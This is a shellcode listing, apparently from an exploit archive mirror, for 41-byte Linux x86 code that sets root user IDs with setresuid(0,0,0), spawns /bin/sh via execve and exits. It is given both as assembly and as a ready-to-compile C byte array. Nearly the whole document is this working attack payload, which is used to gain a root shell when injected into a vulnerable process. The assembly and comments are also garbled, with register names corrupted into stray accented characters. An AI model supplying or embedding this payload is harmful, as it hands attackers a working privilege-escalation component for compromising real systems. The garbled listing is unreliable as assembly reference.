Linux/x86 - setresuid(0,0,0) + execve(/bin/sh) + exit() Shellcode (41 bytes)

2009-01-01 12:05:09

/* linux x86 shellcode(41 bytes) by sacrine of Netric (www.netric.org)
* setresuid(0,0,0); execve /bin/sh; exit;
*

__asm(" xorl êx,êx
xorl ëx,ëx
xorl ìx,ìx
cdq
movb $0xa4, %al
int $0x80

xorl êx,êx
push êx
pushl $0x68732f2f
pushl $0x6e69622f
mov %esp, ëx
push êx
push ëx
lea (%esp,1),ìx
movb $0xb, %al
int $0x80

xorl êx,êx
mov $0x1, %al
int $0x80
");

*/

char main[]=
// setresuid(0,0,0);

"\x31\xc0" // xor êx,êx
"\x31\xdb" // xor ëx,ëx
"\x31\xc9" // xor ìx,ìx
"\x99" // cdq
"\xb0\xa4" // mov $0xa4, %al
"\xcd\x80" // int $0x80

// execve /bin/sh

"\x31\xc0" // xor êx,êx
"\x50" // push êx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,ëx
"\x50" // push êx
"\x53" // push ëx
"\x8d\x0c\x24" // lea (%esp,1),ìx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80

// exit

"\x31\xc0" // xorl êx,êx
"\xb0\x01" // movb $0x1, %al
"\xcd\x80"; // int $0x80

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.